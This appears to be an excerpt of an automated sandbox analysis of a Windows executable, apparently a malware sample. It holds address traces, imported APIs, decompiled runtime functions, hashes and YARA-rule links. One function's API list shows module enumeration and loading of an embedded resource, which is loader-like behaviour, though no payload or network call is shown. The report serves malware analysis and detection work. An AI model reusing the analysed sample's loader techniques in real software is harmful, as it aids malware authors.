0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

., xrefs: 0040201F
:, xrefs: 00401B28
o, xrefs: 00401B8D
{, xrefs: 0040211D
5, xrefs: 00402109
%, xrefs: 004020FA
v, xrefs: 0040212C
W, xrefs: 004020E6
4, xrefs: 00402136
!, xrefs: 0040201A
[, xrefs: 00402047
!, xrefs: 00401B1E
x, xrefs: 0040214A
', xrefs: 00402006
o, xrefs: 00402159
V, xrefs: 00402038
_._, xrefs: 00402257
x, xrefs: 00401E69
{, xrefs: 00401E3C
0, xrefs: 00401BBD
[, xrefs: 00401B37
o, xrefs: 00402097
W, xrefs: 00401B14
U, xrefs: 004020F5
*, xrefs: 00401A1F
W, xrefs: 00402033
), xrefs: 0040202E
", xrefs: 00401B0F
h, xrefs: 00401A6F
V, xrefs: 00401E19
4, xrefs: 00402074
v, xrefs: 00401B5A
{, xrefs: 00401B4B
v, xrefs: 0040206A
*, xrefs: 004020E1
', xrefs: 00401AF6
!, xrefs: 004020CF
E, xrefs: 00401E0F
8, xrefs: 00401BA9
4, xrefs: 00401B64
D, xrefs: 00401DFB
v, xrefs: 00401E4B
x, xrefs: 00401B78
W, xrefs: 00401B23
x, xrefs: 00402088
___, xrefs: 0040227D
6, xrefs: 004020C5
{, xrefs: 0040205B
., xrefs: 00401B0A

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: bdc239e17bbc753eaa7a6005036317a9a04fdfc1acee38eec52b9282cd9d1d64
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: bdc239e17bbc753eaa7a6005036317a9a04fdfc1acee38eec52b9282cd9d1d64
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 024F1638, Relevance: 1.6, Strings: 1, Instructions: 348COMMON

Download Yara Rule

Strings

S, xrefs: 024F1945

Memory Dump Source

Source File: 00000001.00000002.270270330.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID:
String ID: S
API String ID: 0-543223747
Opcode ID: fdc9b1d6b465d7c8a75513c3dd99c4c8e61c02968efecf6f5bd7cd4bbb95763a
Instruction ID: 31ddfc049a6a4b7d906b96a38dbc59b5c2bef3205060044fd4353417afebe4f7
Opcode Fuzzy Hash: fdc9b1d6b465d7c8a75513c3dd99c4c8e61c02968efecf6f5bd7cd4bbb95763a
Instruction Fuzzy Hash: F002B074E05228CFDB64DF64C984BEDBBB2FB89304F1085AAD909A7354DB305A85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 024FC9D0, Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.270270330.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7dbe415f49ede39ff1ed00d183a5a505d1924dd2c252c9e6ab722578a7896d9
Instruction ID: 727400d6d9c53b83e0943ed0bc659a4e3644082319f6c52da93e956bb6666730
Opcode Fuzzy Hash: d7dbe415f49ede39ff1ed00d183a5a505d1924dd2c252c9e6ab722578a7896d9
Instruction Fuzzy Hash: 35127134B002198FC754DF69C494AAEB7F6FFC9614B16856AE606EB361DB30DC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 051008E3, Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.274748746.0000000005100000.00000040.00000001.sdmp, Offset: 05100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7799efc6f14934fdcb3e10031bf5f6e36f8d232e5157db210a91d3c71cf758
Instruction ID: e87ecfbe09763e0cd08a7fcb79ba80b01addcb72cde2004ce5836ad42fe29a99
Opcode Fuzzy Hash: aa7799efc6f14934fdcb3e10031bf5f6e36f8d232e5157db210a91d3c71cf758
Instruction Fuzzy Hash: F2F18B35A04B04CFDB25CF69C488BAABBF2FF48310F558969E44A9B791D774E885CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 05107BA8, Relevance: 3.2, Instructions: 3250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.274748746.0000000005100000.00000040.00000001.sdmp, Offset: 05100000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f9676777da1b4560a848d8646d94b41022c50b12dee1d5f071ba819a0f8bf3
Instruction ID: 021b9509c786a1dbc4d4e37b469301c34c876255f98c44933e82e70c559be026
Opcode Fuzzy Hash: d6f9676777da1b4560a848d8646d94b41022c50b12dee1d5f071ba819a0f8bf3
Instruction Fuzzy Hash: 2B637B70A846589FEB20ABA0CC45BEEB6B7EB88701F1140D9E71D2B3D0DB711E849F55

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 024FD328, Relevance: 1.8, Strings: 1, Instructions: 505COMMON

Download Yara Rule

Strings

so, xrefs: 024FD827

Memory Dump Source

Source File: 00000001.00000002.270270330.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID:
String ID: so
API String ID: 0-1026474592
Opcode ID: c2ffe40f7792feee471d464b96027b1513b16a6097e5d7ca2a748e1a68371fa2
Instruction ID: 8ecce7b9b918bf686a9428bd3395b10e4c4f24041d14da7a550259b2b74bfcf8
Opcode Fuzzy Hash: c2ffe40f7792feee471d464b96027b1513b16a6097e5d7ca2a748e1a68371fa2
Instruction Fuzzy Hash: 29123B74B00604CFCB54DF39C494A6ABBF2BF89608B1584AAE646CB376DB34EC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 024FC1D0, Relevance: 1.7, Strings: 1, Instructions: 465COMMON

Download Yara Rule

Strings

d, xrefs: 024FC423

Memory Dump Source

Source File: 00000001.00000002.270270330.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5b4d56bad23a58486f555b0b8e517fdf11ff898778c2ffbf42f25235cd488a09
Instruction ID: 54ddb6e80f57721968a39045b097412036dd9677a8a29f533b3d172148a52234
Opcode Fuzzy Hash: 5b4d56bad23a58486f555b0b8e517fdf11ff898778c2ffbf42f25235cd488a09
Instruction Fuzzy Hash: BC026B346006098FD764DF69C4C096AB7F2FFC8314B15DA6AD55A9B7A1CB30F846CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05104AE8, Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

(, xrefs: 0510480D

Memory Dump Source

Source File: 00000001.00000002.274748746.0000000005100000.00000040.00000001.sdmp, Offset: 05100000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: d86a06e34692debb03df7befb8f3b5f1f6ba07946f151fca3f290cc26050543f
Instruction ID: bbccf80ce8455a716b23b5a4b090d0358d58f498551f3681ecc519ee58ad5fe1
Opcode Fuzzy Hash: d86a06e34692debb03df7befb8f3b5f1f6ba07946f151fca3f290cc26050543f
Instruction Fuzzy Hash: BCF11C34A00218CFCF19DF64C494BADBBB2BF89305F1184A9E90A9B295DBB5DD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05103570, Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

@, xrefs: 05103912

Memory Dump Source

Source File: 00000001.00000002.274748746.0000000005100000.00000040.00000001.sdmp, Offset: 05100000, based on PE: false

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6fe86e68bc56578d2f3862fe4abcbe4439650894f192b499caea06319fe76b20
Instruction ID: 9537fcab752337150c3f0133219f3549fef33788d0313946b01957f8f37bc6b4
Opcode Fuzzy Hash: 6fe86e68bc56578d2f3862fe4abcbe4439650894f192b499caea06319fe76b20
Instruction Fuzzy Hash: 79C19D74A042059FCB15DF68C5849AEBBF2FF48300B15C8AAE915DB3A2D770ED44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 004104E0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004104E0() {
				void* _t1;

				_t1 = E0041046E(0); // executed
				return _t1;
			}

0x004104e2
0x004104e8

APIs

__encode_pointer.LIBCMT ref: 004104E2

Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000004,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
Part of subcall function 0041046E: RtlEncodePointer.NTDLL(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104D5

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 0e51a9b5fb3a4ef556cbf6530202f05b5f2c67c7b2b168a65c09d71fd2c62196
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0510FD31, Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

", xrefs: 0510FED4

Memory Dump Source

Source File: 00000001.00000002.274748746.0000000005100000.00000040.00000001.sdmp, Offset: 05100000, based on PE: false

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 0ae0ebd8574fc5b4ba77afbf9ab74beb774ef781d3d01ee98de3cb157d4e5fd0
Instruction ID: cf67fe1749694a17b98409e34dc97da37cffb18a3785b6a24b1a2be0179db963
Opcode Fuzzy Hash: 0ae0ebd8574fc5b4ba77afbf9ab74beb774ef781d3d01ee98de3cb157d4e5fd0
